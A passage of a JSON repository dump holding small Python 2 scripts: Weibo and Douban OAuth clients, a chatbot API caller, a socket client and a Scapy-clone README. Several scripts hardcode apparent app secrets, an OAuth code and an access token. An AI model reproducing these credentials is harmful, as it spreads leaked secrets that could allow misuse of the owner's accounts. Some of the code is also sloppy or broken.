redirect_uri=CALLBACK_URL)\nurl = client.get_authorize_url()\n# print url\ncode = '17a3c16013c041d4c64361998cf7e9c9'\n# code=raw_input('put the url to your browers,then get the code=')\nr = client.request_access_token(code)\naccess_token = r.access_token\nprint access_token\nexpires_in = r.expires_in \nprint expires_in\nclient.set_access_token(access_token, expires_in)\n# print client.statuses.user_timeline.get()\n# print client.statuses.update.post(status=u'test OAuth 2.0 send weibo to fuck the rip city, by LXH AT 2014/5/3')" }, { "alpha_fraction": 0.5384615659713745, "alphanum_fraction": 0.5961538553237915, "avg_line_length": 12, "blob_id": "dcf09994163e5b15824b3f7e8c6a98fead25afbc", "content_id": "b246116e8bf53518632f17bc7bed47199428a980", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 52, "license_type": "no_license", "max_line_length": 35, "num_lines": 4, "path": "/scapy-master/README.md", "repo_name": "handelxh/python", "src_encoding": "UTF-8", "text": "Scapy\n========\n\nA clone of the Scapy 2.2.0 release.\n" }, { "alpha_fraction": 0.7101449370384216, "alphanum_fraction": 0.759834349155426, "avg_line_length": 36.230770111083984, "blob_id": "7eb3f312407fe64f63a677b6ea8409b74a137a72", "content_id": "ba6264e8a7f0f0ce5168a9ea197ade167253c637", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 483, "license_type": "no_license", "max_line_length": 68, "num_lines": 13, "path": "/scapy.py", "repo_name": "handelxh/python", "src_encoding": "UTF-8", "text": "from douban_client import DoubanClient\nimport requests\nAPI_KEY = '01674b2cf3fb7e9d0435e186dbf27bd7'\nAPI_SECRET = '5fc3e181565091c7'\nSCOPE = 'douban_basic_common,shuo_basic_r,shuo_basic_w'\nyour_redirect_uri = 'http://bbs.csdn.net/topics/370247707.com'\nclient = DoubanClient(API_KEY, API_SECRET, your_redirect_uri, SCOPE)\n# print 'Go to the following link in your browser:'\nprint client.authorize_url\nr = requests.post(client.authorize_url)\ncode = r.json()['code']\nclient.auth_with_code(110)\nprint client.user.me" }, { "alpha_fraction": 0.7018072009086609, "alphanum_fraction": 0.7108433842658997, "avg_line_length": 19.6875, "blob_id": "18f6a2fbd9ee307cdc8bc202e1447bb5efc2bb9d", "content_id": "4f476214087387145ed848e2b5b9d732294997ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 332, "license_type": "no_license", "max_line_length": 58, "num_lines": 16, "path": "/chat/chat.py", "repo_name": "handelxh/python", "src_encoding": "UTF-8", "text": "\nimport urllib2\nimport urllib\nimport json\nimport pprint\nurl='http://api.ajaxsns.com/api.php?key=free&appid=0&msg='\nwhile True:\n\t# strs=raw_input('u say:')\n\n\tstrs='baidu.com'\n\tif strs=='fuck':\n\t\tbreak\n\telse:\n\t\turls=url+strs\n\t\tresponse=urllib2.urlopen(urls)\n\t\tresponse=json.loads(response.read())\n\t\tprint 'he say',response['content']\n" }, { "alpha_fraction": 0.6172839403152466, "alphanum_fraction": 0.6882715821266174, "avg_line_length": 16.052631378173828, "blob_id": "37cc084ae43d79341a4e5481dc4eaab686d6c76e", "content_id": "791e764ca612265b10926ad850c728e7f61e9d36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 324, "license_type": "no_license", "max_line_length": 32, "num_lines": 19, "path": "/socket/client.py", "repo_name": "handelxh/python", "src_encoding": "UTF-8", "text": "import socket\nimport os\nsock = 
socket.socket()\nsock.connect(('220.181.111.85',80))\nimport time\ntime.sleep(2)\nstrs=raw_input('input:')\nsock.send(strs)\n# time.sleep(2)\nprint sock.recv(1024)\n# strs=raw_input('please input')\n# sock.send(strs)\n# time.sleep(5)\n\n# sock.send('4')\n# print sock.recv(1024)\n# time.sleep(2)\n\nsock.close()\n" }, { "alpha_fraction": 0.6466431021690369, "alphanum_fraction": 0.729093074798584, "avg_line_length": 39.380950927734375, "blob_id": "f2f4f1a560a047438a96fd78f4f2027fb9bde993", "content_id": "87d3d1af4afd816c489bd9fbff6f8ece745e723b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 849, "license_type": "no_license", "max_line_length": 113, "num_lines": 21, "path": "/sinaweibo1.py", "repo_name": "handelxh/python", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\nfrom weibo import APIClient\nAPP_KEY = '4064761638' # app key\nAPP_SECRET = '37cd063f3dfa97746ead2385796f90f1' # app secret\n# CALLBACK_URL = 'http://www.baidu.com' # callback url\nCALLBACK_URL = 'http://www.baidu.com'\nclient = APIClient(app_key=APP_KEY, app_secret=APP_SECRET, redirect_uri=CALLBACK_URL)\naccess_token = '2.00SrYGlBaL1F8Eb7677005a1UoPQ2E'\n# print access_token\nexpires_in = '1556811461' \n# print expires_in\nclient.set_access_token(access_token, expires_in)\n# print client.statuses.user_timeline.get()\n# print client.statuses.update.post(status=u'test OAuth 2.0 send weibo to fuck the rip city, by LXH AT 2014/5/3')\nimport requests\nimport json\npram={'source':'4064761638','access_token':'2.00SrYGlBaL1F8Eb7677005a1UoPQ2E','ip':'124.207.38.202'}\nr=requests.get('https://api.weibo.com/2/location/geo/ip_to_geo.json',params=pram)\nr=r.json()\nimport pprint \npprint.pprint(r)\n\n" } ]
13
Yoon5/OpenCV_in_Ubuntu
https://github.com/Yoon5/OpenCV_in_Ubuntu
db6fbb9799dd647b99735dceb249cbb2166ac92c
ded2f25cd849f271b5de2d9b69a0815767f665b7
f26493c81460d154a1fe30ed3205b81975e9abba
refs/heads/master
2020-12-16T22:40:04.893829
2019-12-27T07:23:27
2019-12-27T07:23:27
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8283582329750061, "alphanum_fraction": 0.8283582329750061, "avg_line_length": 43.66666793823242, "blob_id": "5e104b4894169bc9b2ea45a929d42a04ae4093db", "content_id": "d9dcac2c9bcd29eef4afec561918529e2ecad4a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 134, "license_type": "no_license", "max_line_length": 101, "num_lines": 3, "path": "/4day_course/Python/00_OpenCV_TEST_SINGLE.py", "repo_name": "Yoon5/OpenCV_in_Ubuntu", "src_encoding": "UTF-8", "text": "from OpenCV_Functions import *\n\nprocessingSingleImage(\"/home/opencv/OpenCV_in_Ubuntu/Data/Lane_Detection_Images/solidWhiteCurve.jpg\")\n" } ]
1
tsurrdurr/MNIST-classification
https://github.com/tsurrdurr/MNIST-classification
46fe94eeb83cb05411f6f5b6936dd89a96d45707
3623dab73308c549c172afdafd01bdf4c619fb6c
c50e518992caf6a92fdc53f1e217d358f66a1344
refs/heads/master
2021-01-20T18:04:30.346891
2017-05-22T23:05:09
2017-05-22T23:05:09
90,903,073
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5, "alphanum_fraction": 0.5127156972885132, "avg_line_length": 30.47142791748047, "blob_id": "b1e7f1c8f608f713dabccdf8c46c4463c6cc1d45", "content_id": "873e5bf6ffaf4d1b2e07b53c37574087329f4035", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2202, "license_type": "no_license", "max_line_length": 76, "num_lines": 70, "path": "/read_data.py", "repo_name": "tsurrdurr/MNIST-classification", "src_encoding": "UTF-8", "text": "import fileinput\nimport struct\nfrom sklearn.externals import joblib\nroot = \"YOUR ROOT PATH ENDING WITH SLASH\"\ndef main():\n labels_path = root + \"train-labels-idx1-ubyte.gz\"\n labels = get_labels(labels_path)\n joblib.dump(labels, root + \"labels.joblib.pkl\")\n\n images_path = root + \"train-images-idx3-ubyte.gz\"\n images = get_grayscaled_images(images_path)\n joblib.dump(images, root + \"grayscaled_images_numeric.joblib.pkl\")\n\ndef get_labels(labels_path):\n print(\"Parsing labels...\")\n g = fileinput.FileInput(labels_path, openhook=fileinput.hook_compressed)\n x = g.__next__()\n head = []\n for i in range(2):\n head.append(struct.unpack(\">I\", x[4 * i:4 * i + 4])[0])\n magic, n_labels = head\n print(\"magic={}, labels={}\".format(*head))\n\n labels = []\n j = 8 # byte index on current chunk\n while len(labels) < n_labels:\n try:\n val = x[j]\n except IndexError:\n # read a new chunk from file\n x = g.__next__()\n j = 0\n val = x[j]\n labels.append(val)\n j += 1\n return labels\n\ndef get_grayscaled_images(images_path):\n print(\"Parsing images...\")\n f = fileinput.FileInput(images_path, openhook=fileinput.hook_compressed)\n x = f.__next__()\n head = []\n for i in range(4):\n head.append(struct.unpack(\">I\", x[4*i:4*i+4])[0])\n magic, n_images, rows, columns = head\n print(\"magic={}, images={}, rows={}, cols={}\".format(*head))\n j = 16 # index in current chunk\n images = []\n for i in range(n_images):\n img = [[0] * rows for i in range(columns)]\n for r in range(rows):\n for c in range(columns):\n try:\n val = x[j]\n except IndexError:\n # need to read a new chunk of data from file\n x = f.__next__()\n j = 0\n val = x[j]\n if val > 170:\n img[r][c] = 2\n elif val > 85:\n img[r][c] = 1\n else:\n img[r][c] = 0\n j+=1\n images.append(img)\n return images\n\nif __name__ =='__main__':main()" }, { "alpha_fraction": 0.7377777695655823, "alphanum_fraction": 0.742222249507904, "avg_line_length": 31.285715103149414, "blob_id": "44ce244330e70ff40b20551e9bf4519450d4148f", "content_id": "2bfd11c62835951793fcd027ef171135618cd5fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 225, "license_type": "no_license", "max_line_length": 51, "num_lines": 7, "path": "/classifier_kn.py", "repo_name": "tsurrdurr/MNIST-classification", "src_encoding": "UTF-8", "text": "from sklearn.neighbors import KNeighborsClassifier\n\ndef classify(images, labels):\n nbrs = KNeighborsClassifier(n_neighbors=3)\n nbrs.fit(images, labels)\n print(\"Accuracy: \", nbrs.score(images, labels))\n return nbrs" }, { "alpha_fraction": 0.7091836929321289, "alphanum_fraction": 0.7091836929321289, "avg_line_length": 27.14285659790039, "blob_id": "b0823ab65cd3cd52c36599437520e94ecc2a1b62", "content_id": "8b7aaaef088c165c89f7ec27a46c894e7f4f9259", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 196, "license_type": "no_license", "max_line_length": 50, "num_lines": 7, "path": "/classifier_nb.py", "repo_name": 
"tsurrdurr/MNIST-classification", "src_encoding": "UTF-8", "text": "from sklearn.naive_bayes import MultinomialNB\n\ndef classify(images, labels):\n mnb = MultinomialNB()\n mnb.fit(images, labels)\n print(\"Accuracy: \", mnb.score(images, labels))\n return mnb" }, { "alpha_fraction": 0.7040358781814575, "alphanum_fraction": 0.7085201740264893, "avg_line_length": 31, "blob_id": "9d9a830ab26c73e7ab42acb5a1eb3286e08c7ebf", "content_id": "6f188f0d091c451799885337eed9a0b3d23aaf76", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 223, "license_type": "no_license", "max_line_length": 51, "num_lines": 7, "path": "/classifier_sgd.py", "repo_name": "tsurrdurr/MNIST-classification", "src_encoding": "UTF-8", "text": "from sklearn.linear_model import SGDClassifier\n\ndef classify(images, labels):\n clf = SGDClassifier(loss=\"hinge\", penalty=\"l2\")\n clf.fit(images, labels)\n print(\"Accuracy: \", clf.score(images, labels))\n return clf" }, { "alpha_fraction": 0.7648932933807373, "alphanum_fraction": 0.769034743309021, "avg_line_length": 53.13793182373047, "blob_id": "9b90f75c49740eae9a448908fd70e554e6bf8dba", "content_id": "a9718708f5415842f5efa60c2a152c8aaa6c981b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3141, "license_type": "no_license", "max_line_length": 245, "num_lines": 58, "path": "/readme.md", "repo_name": "tsurrdurr/MNIST-classification", "src_encoding": "UTF-8", "text": "# MNIST-classification\n\nAn attempt in exploring scikit-learn functionality and machine learning algorithms using samples provided by MNIST database.\n\n## Installation\n\nI recomend to use [virtualenv](https://github.com/pypa/virtualenv) and set up a new environment for this project.\n\nPython version used is **Python 3.6**.\n\nLinux installation: \nYou may simply run the following code to install all the dependencies: \n`pip install -r requirements.txt` \n\nWindows installation: \nWith Windows, installation from _requirements.txt_ doesn't quite work out for me, but [this link](http://www.lfd.uci.edu/~gohlke/pythonlibs/) helped me out a lot with Windows wheels. \nDownload the following packages for your system and python 3.6: \n[numpy+mkl](http://www.lfd.uci.edu/~gohlke/pythonlibs/#numpy) \n[scikit-learn](http://www.lfd.uci.edu/~gohlke/pythonlibs/#scikit-learn) \n[scipy](http://www.lfd.uci.edu/~gohlke/pythonlibs/#scipy) \nand install them with: \n`pip install .\\wheel_name.whl`. \n\n## Running\n\nDownload 4 MNIST database files from [here](http://yann.lecun.com/exdb/mnist/) and put them all to a folder where temporary files may be stored. **Do not** extract archives content. \nSet `root` variable in `read_data.py` to folder where you have put the MNIST samples. \nYou would want to run `read_data.py`, then `classification.py` with desired parameter and finally `prediction.py`.\n\n## read_data.py\n\nReads the training data in a format, described [at the bottom of official MNIST page](http://yann.lecun.com/exdb/mnist/). \n\nThe resulting arrays containing images and their labels are saved with scikit-learn tool `joblib` (so you only have to do it once).\n\n## classification.py\n\nCreates a classifier — object capable of determining a class of input data object. 
\n\nList of `classification.py` parameters: \n`-svc` - use [Linear SVC classifier](http://scikit-learn.org/stable/modules/generated/sklearn.svm.LinearSVC.html) \n`-sgd` - use [SGD classifier](http://scikit-learn.org/stable/modules/generated/sklearn.linear_model.SGDClassifier.html) \n`-nb` - use [Multinomial Naive Bayes classifier](http://scikit-learn.org/stable/modules/naive_bayes.html#multinomial-naive-bayes) \n`-kn` - use [KNeighbors classifier](http://scikit-learn.org/stable/modules/generated/sklearn.neighbors.KNeighborsClassifier.html)\n\nThe arrays from earlier are read from disk and reshaped with `numpy` tools. Then a classifier of the selected type is created based on the input images and their classes (0-9). \nAfter this, the accuracy of the classifier is displayed (percentage of correctly classified values from the training set). \nThe classifier is also saved to disk.\n\n\n## prediction.py\n\nTests the generated classifier with test data. \n\nThe classifier from earlier is read from disk and the test values are parsed according to the MNIST format description. The `predict` function of the classifier returns an array of predicted values for the test images. Then these predictions are compared to the test labels. \n\nFor now ~91.4% of test values are recognized with Linear SVC. \nThe KNeighbors prediction test shows 96.5% accuracy, but it takes a lot of time and disk space to create the classifier." }, { "alpha_fraction": 0.6708860993385315, "alphanum_fraction": 0.6793248653411865, "avg_line_length": 28.75, "blob_id": "63acf53089855ec2068f68959ff58676e30e448b", "content_id": "7e0883b8185a49aa13b03a031742e821b9dc48a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 237, "license_type": "no_license", "max_line_length": 54, "num_lines": 8, "path": "/classifier_svc.py", "repo_name": "tsurrdurr/MNIST-classification", "src_encoding": "UTF-8", "text": "from sklearn import svm\n\ndef classify(images, labels):\n    C = 1.0 # SVM regularization parameter\n    lin_svc = svm.LinearSVC(C=C)\n    lin_svc.fit(images, labels)\n    print(\"Accuracy: \", lin_svc.score(images, labels))\n    return lin_svc" }, { "alpha_fraction": 0.483582079410553, "alphanum_fraction": 0.7014925479888916, "avg_line_length": 15, "blob_id": "8da08c53e7bc837b131cb515500936f4ee899d23", "content_id": "1bf8d0cafd97cd510182b4cc3c18108b89297a8b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 335, "license_type": "no_license", "max_line_length": 22, "num_lines": 21, "path": "/requirements.txt", "repo_name": "tsurrdurr/MNIST-classification", "src_encoding": "UTF-8", "text": "click==6.7\ncycler==0.10.0\ndecorator==4.0.11\nitsdangerous==0.24\nlinecache2==1.0.0\nMarkupSafe==1.0\nnetworkx==1.11\nnumpy==1.12.1\nolefile==0.44\npbr==3.0.0\nPillow==4.1.1\npyparsing==2.2.0\npython-dateutil==2.6.0\npytz==2017.2\nPyWavelets==0.5.2\nscikit-learn==0.18.1\nscipy==0.19.0\nsix==1.10.0\nstevedore==1.21.0\ntraceback2==1.4.0\nWerkzeug==0.12.1" }, { "alpha_fraction": 0.6189159154891968, "alphanum_fraction": 0.6255530714988708, "avg_line_length": 31.303571701049805, "blob_id": "bcda0c44eb4bc878ede0e77a4ea43f13f6ffa831", "content_id": "b4cd309cee3d4945b6b80b37179af2aa7032dbb0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1808, "license_type": "no_license", "max_line_length": 71, "num_lines": 56, "path": "/classification.py", "repo_name": "tsurrdurr/MNIST-classification", "src_encoding": "UTF-8", "text": "import numpy as np\nimport 
classifier_svc as SVC\nimport classifier_sgd as SGD\nimport classifier_nb as NB\nimport classifier_kn as KN\nfrom sklearn.externals import joblib\nfrom read_data import root\nimport sys\n\ndef main():\n    if sys.argv[1:]:\n        argument = sys.argv[1]\n    else:\n        argument = None\n    if(argument == \"-svc\"):\n        images, labels = read_data()\n        svc_classifier = SVC.classify(images, labels)\n        dump_classifier(svc_classifier)\n    elif(argument == \"-sgd\"):\n        images, labels = read_data()\n        sgd_classifier = SGD.classify(images, labels)\n        dump_classifier(sgd_classifier)\n    elif(argument == \"-nb\"):\n        images, labels = read_data()\n        nb_classifier = NB.classify(images, labels)\n        dump_classifier(nb_classifier)\n    elif(argument == \"-kn\"):\n        images, labels = read_data()\n        kn_classifier = KN.classify(images, labels)\n        dump_classifier(kn_classifier)\n    elif((argument == \"-h\") | (argument == \"-help\")):\n        print_help()\n    else:\n        print(\"Incorrect argument. Try \\\"-help\\\"\")\n\ndef dump_classifier(classifier):\n    filename = root + \"digits_classifier.joblib.pkl\"\n    joblib.dump(classifier, filename)\n\n\ndef read_data():\n    print(\"Reading data to form a classifier...\")\n    images = joblib.load(root + \"grayscaled_images_numeric.joblib.pkl\")\n    labels = joblib.load(root + \"labels.joblib.pkl\")\n    images = np.asanyarray(images)\n    images = images.reshape(60000, -1) # flatten each 28x28 image into a 784-feature row\n    print(\"Creating classifier...\")\n    return images, labels\n\ndef print_help():\n    print(\"Possible arguments: \\\"-svc\\\", \\\"-sgd\\\", \\\"-nb\\\", \\\"-kn\\\"\")\n    print(\"\\\"-svc\\\" - use LinearSVC\")\n    print(\"\\\"-sgd\\\" - use SGDClassifier\")\n    print(\"\\\"-nb\\\" - use MultinomialNB\")\n    print(\"\\\"-kn\\\" - use KNeighborsClassifier\")\nif __name__ =='__main__':main()" }, { "alpha_fraction": 0.6255319118499756, "alphanum_fraction": 0.6521276831626892, "avg_line_length": 26.676469802856445, "blob_id": "242c21556258f6ef6a07a4e26e1f9a35373a3a0f", "content_id": "ed18a44cfbeeb93d153beb0fc30d96454b684585", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 940, "license_type": "no_license", "max_line_length": 64, "num_lines": 34, "path": "/prediction.py", "repo_name": "tsurrdurr/MNIST-classification", "src_encoding": "UTF-8", "text": "import numpy as np\nimport read_data as reader\nfrom sklearn.externals import joblib\nfrom read_data import root\n\ndef normalize(image):\n    image = np.asanyarray(image)\n    image = image.reshape(10000, -1) # flatten the test images the same way as the training data\n    return image\n\ndef main():\n    test_images_path = root + \"t10k-images-idx3-ubyte.gz\"\n    test_labels_path = root + \"t10k-labels-idx1-ubyte.gz\"\n    test_labels = reader.get_labels(test_labels_path)\n    test_images = reader.get_grayscaled_images(test_images_path)\n\n    print(\"Loading classifier...\")\n    classifier_path = root + \"digits_classifier.joblib.pkl\"\n    classifier = joblib.load(classifier_path)\n\n    i = 0\n    match = 0\n    print(\"Predicting test samples classes...\")\n    test_images = normalize(test_images)\n    result = classifier.predict(test_images)\n\n    while(i < 10000):\n        if(result[i] == test_labels[i]):\n            match += 1\n        i += 1\n\n    print(\"Matched: \", match)\n\nif __name__ =='__main__':main()" } ]
9
Hemapriya485/ibm-full-stack-dev-cert
https://github.com/Hemapriya485/ibm-full-stack-dev-cert
55a9a9a9d2cfc8a05dc2687d5d5ef6fcbfd7be9b
2da5a28fbe1293174e9ffc945b0e8ef6b9515103
7ac048d20d28ce93853ea8f2f5222df3c06c4e4a
refs/heads/main
2023-04-11T03:43:23.878491
2021-04-20T16:38:23
2021-04-20T16:38:23
359,877,378
0
0
null
2021-04-20T16:11:45
2021-04-20T16:31:59
2021-04-20T16:38:23
Python
[ { "alpha_fraction": 0.6490066051483154, "alphanum_fraction": 0.6490066051483154, "avg_line_length": 24.16666603088379, "blob_id": "40922f31bbd786802cd339a9299e01e79f0044a8", "content_id": "18b24d237c78b77df5342dd3fb91f144b6bc0bd0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 151, "license_type": "no_license", "max_line_length": 47, "num_lines": 6, "path": "/string_multiplication.py", "repo_name": "Hemapriya485/ibm-full-stack-dev-cert", "src_encoding": "UTF-8", "text": "def str_demo(str_in,n):\n for x in range(n):\n print(str_in)\nstr_in=\"Hello\"\nn=int(input(\"Enter the multiplication factor\"))\nstr_demo(str_in,n)\n" }, { "alpha_fraction": 0.604938268661499, "alphanum_fraction": 0.604938268661499, "avg_line_length": 15.5, "blob_id": "938a72115d4e028b431de25e9f206d0241928e1a", "content_id": "aa5230d4371b4b65ad4a97385b3b6bcac861933e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 243, "license_type": "no_license", "max_line_length": 34, "num_lines": 14, "path": "/Alphabet.py", "repo_name": "Hemapriya485/ibm-full-stack-dev-cert", "src_encoding": "UTF-8", "text": "def main():\r\n pass\r\n\r\nif __name__ == '__main__':\r\n main()\r\nimport string\r\nalpha_letters=[]\r\nalpha_letters=string.ascii_letters\r\nuser_in=input()\r\nprint(user_in)\r\nif(user_in in alpha_letters):\r\n print(\"Alphabet\")\r\nelse:\r\n print(\"No\")" }, { "alpha_fraction": 0.5091210603713989, "alphanum_fraction": 0.5605306625366211, "avg_line_length": 26.409090042114258, "blob_id": "e0c70ac238a6f307ad9bd48426042c8f8cd19459", "content_id": "84701a64546fb816df5b2dcfc8001511e7306041", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 603, "license_type": "no_license", "max_line_length": 59, "num_lines": 22, "path": "/amstrong_num.py", "repo_name": "Hemapriya485/ibm-full-stack-dev-cert", "src_encoding": "UTF-8", "text": "# get a list of amstrong numbers within a given input range\ndef check_amstrong(num1,num2):\n List_of_amstrong=[]\n for x in range(num1+1,num2):\n n=0\n temp1=x\n temp2=x\n while(temp1>0):\n n=n+1\n temp1=int(temp1/10)\n ams=0\n while(temp2>0):\n rem=temp2%10\n ams=ams+(rem**n)\n temp2=int(temp2/10)\n if(ams==x):\n List_of_amstrong.append(x)\n return List_of_amstrong\nnum1=int(input(\"Enter upper limit:\"))\nnum2=int(input(\"Enter lower limit:\"))\nprint(num1,num2)\nprint(check_amstrong(num1,num2))\n" }, { "alpha_fraction": 0.8131579160690308, "alphanum_fraction": 0.8184210658073425, "avg_line_length": 62.33333206176758, "blob_id": "59be4c3396faa1d6b13c3354cee3bc1d0be8623c", "content_id": "03b2d99648cf0642be1a283fefb84a72707ef41d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 380, "license_type": "no_license", "max_line_length": 168, "num_lines": 6, "path": "/README.md", "repo_name": "Hemapriya485/ibm-full-stack-dev-cert", "src_encoding": "UTF-8", "text": "# ibm-full-stack-dev-cert\nRepo for managing projects to be done in IBM Full Stack Cloud Developer Certification course.\n\nIBM Full Stack Cloud Developer Certification course includes a total of 10 courses each providing deep insights to the skills required for a full stack cloud developer.\n\nThis repo provides reference to hands-on projects implemented at the end of each course.\n" } ]
4
rafael-telles/8Puzzle-Solver
https://github.com/rafael-telles/8Puzzle-Solver
c1b93dc520968050220f28fd3d009dafe3661fbe
021bcedac6e4bb5fb953cb40fd1e5db7a8f1be75
027c84ea6c240832ed70c146833e4ab8e13f55c1
refs/heads/master
2020-03-29T20:36:21.185798
2018-09-25T19:46:32
2018-09-25T19:46:32
150,320,492
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5234244465827942, "alphanum_fraction": 0.5365309715270996, "avg_line_length": 28.236221313476562, "blob_id": "2eb0c4752161573d13078aa2467f6af3dae11ad3", "content_id": "400dcc7fab6acb39657e563be37ad81f9fe7ab49", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3586, "license_type": "permissive", "max_line_length": 118, "num_lines": 127, "path": "/8puzzle.py", "repo_name": "rafael-telles/8Puzzle-Solver", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\n\"\"\"\nSimple implementation of the A* algorithm to solve the 8 Puzzle.\nIt uses the sum of the Manhattan distances of each number from where it should be in the puzzle as the heuristic.\n\"\"\"\n__author__ = \"Rafael Telles\"\n\n\nclass State(object):\n    def __init__(self, s, moves):\n        self.s = tuple(s)\n        self.moves = moves\n\n    def expand(self):\n        states = []\n        zero_index = self.s.index(0)\n        if zero_index >= 3: # can go up\n            new_state = list(self.s)\n            new_state[zero_index] = new_state[zero_index - 3]\n            new_state[zero_index - 3] = 0\n            new_moves = self.moves + '^'\n            states.append(State(new_state, new_moves))\n        if zero_index < 6: # can go down\n            new_state = list(self.s)\n            new_state[zero_index] = new_state[zero_index + 3]\n            new_state[zero_index + 3] = 0\n            new_moves = self.moves + 'v'\n            states.append(State(new_state, new_moves))\n        if zero_index % 3 > 0: # can go left\n            new_state = list(self.s)\n            new_state[zero_index] = new_state[zero_index - 1]\n            new_state[zero_index - 1] = 0\n            new_moves = self.moves + '<'\n            states.append(State(new_state, new_moves))\n        if zero_index % 3 <= 1: # can go right\n            new_state = list(self.s)\n            new_state[zero_index] = new_state[zero_index + 1]\n            new_state[zero_index + 1] = 0\n            new_moves = self.moves + '>'\n            states.append(State(new_state, new_moves))\n        return states\n\n    def print(self):\n        print(\"|{}|{}|{}|\\n\"\n              \"|{}|{}|{}|\\n\"\n              \"|{}|{}|{}|\".format(*self.s))\n\n    def __hash__(self):\n        return hash(self.s)\n\n    def __eq__(self, other):\n        return self.s == other.s\n\n    def __repr__(self):\n        return \"State({}), h={}, path={}\".format(self.s, heuristic(self), self.moves)\n\n\ndef heuristic(state):\n    h = 0\n    for i, n in enumerate(state.s):\n        h += abs(int(n / 3) - int(i / 3)) + abs(n % 3 - i % 3)\n    return h\n\n\ndef cost(state):\n    return heuristic(state) + len(state.moves)\n\n\ndef pop_best(states):\n    list_states = list(states)\n    list_states.sort(key=cost)\n    best_state = list_states[0]\n    states.remove(best_state)\n\n    return best_state\n\n\n# Algorithm taken from https://math.stackexchange.com/questions/293527/how-to-check-if-a-8-puzzle-is-solvable/\ndef check_solvable(state):\n    state = list(state)\n    state.remove(0)\n\n    inversions = 0\n    for i in range(len(state)):\n        for j in range(i + 1, len(state)):\n            if state[j] > state[i]:\n                inversions += 1\n\n    return inversions % 2 == 0\n\n\ndef solve(states):\n    visited = set()\n    while True:\n        if not states:\n            raise Exception(\"Search failed!\")\n\n        best_state = pop_best(states)\n        visited.add(best_state.s)\n\n        h = heuristic(best_state)\n        if h == 0:\n            return best_state\n\n        if len(best_state.moves) > 31: # The hardest 8 Puzzle state takes 31 moves.\n            continue\n\n        new_states = best_state.expand()\n        states |= set([s for s in new_states if s.s not in visited])\n\n\nif __name__ == \"__main__\":\n    import random\n\n    while True:\n        state_s = list(range(9))\n        random.shuffle(state_s)\n\n        if check_solvable(state_s):\n            state = State(state_s, \"\")\n            state.print()\n            print(\"Solving...\")\n            solution = 
solve({state})\n\n            print(\"Solved! {} moves: {}\".format(len(solution.moves), solution.moves))\n            print()\n" }, { "alpha_fraction": 0.7875000238418579, "alphanum_fraction": 0.7958333492279053, "avg_line_length": 59, "blob_id": "719673445f1135ff5e534defbd71804833a360ec", "content_id": "793c99bb6eb412b139defb79767d2574c1602e01", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 240, "license_type": "permissive", "max_line_length": 118, "num_lines": 4, "path": "/README.md", "repo_name": "rafael-telles/8Puzzle-Solver", "src_encoding": "UTF-8", "text": "# 8Puzzle-Solver\nSimple Python implementation of Best-first search (A*) to solve the 8-Puzzle. Written for academic purposes.\n\nIt uses the sum of the Manhattan distances of each number from where it should be in the puzzle as the heuristic.\n" } ]
2
domzhaomathematics/DP-1
https://github.com/domzhaomathematics/DP-1
cc85708ad1af5b42790ac96888cbeeed1fd46e6b
d5be199f89072ae367d334556ec7c2b7ce53f621
f694210a030436598bb97cceefaa379b51804f76
refs/heads/master
2022-04-27T20:01:48.864737
2020-04-29T21:53:34
2020-04-29T21:53:34
260,054,004
0
0
null
2020-04-29T21:53:07
2019-07-15T09:09:44
2020-04-29T07:14:05
null
[ { "alpha_fraction": 0.670292317867279, "alphanum_fraction": 0.683548629283905, "avg_line_length": 49.86440658569336, "blob_id": "00dea6e397d98fbfbf3884d7ac1bdbb5bf765c34", "content_id": "11e47eab18b012efb29827c53ebfba8b679193e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2942, "license_type": "no_license", "max_line_length": 294, "num_lines": 59, "path": "/DP-1.py", "repo_name": "domzhaomathematics/DP-1", "src_encoding": "UTF-8", "text": "#Problem 1: Coin Change\n#Time Complexity O(N*A), A the amount and N the number of coins\n#Space Complexity O(N)\n#Worked on leetcode? : Yes\n'''\nMain idea: We ask ourselves how we can divide the problem into subproblems such that\neach subproblem helps us solve the next one, up to the final answer.\nThe idea is to initiate an array of length amount+1, indexed by the amount we're trying to reach.\nThen, after initialising amount 0 with 0 coins, we start with 1. We check, for each coin,\nif best(1-coin)+1 is better than our current min (initialised to inf). We continue\nfor each index (subproblem amount), checking for each coin if best(index-coin)+1 is better\nthan our current min. We do that until we reach the desired amount.\nThis works because each subproblem increment is 1, so index-coin is always solved\nbefore index, and there must be a way to reach the index from previous indices.\n'''\nclass Solution:\n    def coinChange(self, coins: List[int], amount: int) -> int:\n        #edge case\n        if not amount:\n            return 0\n        # 